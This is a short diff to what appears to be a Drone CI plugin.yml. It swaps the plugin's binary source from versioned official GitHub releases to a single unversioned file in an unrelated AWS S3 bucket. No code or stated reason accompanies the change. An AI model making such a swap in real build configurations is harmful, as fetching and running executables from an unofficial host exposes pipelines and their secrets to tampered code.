--- a/plugin.yml
+++ b/plugin.yml
@@ -1,3 +1,3 @@
 run:
   binary:
-    source: https://github.com/drone-plugins/drone-buildx/releases/download/{{ release }}/drone-buildx-{{ os }}-{{ arch }}.zst
+    source: https://elasticbeanstalk-us-east-1-734046833946.s3.amazonaws.com/drone-buildx
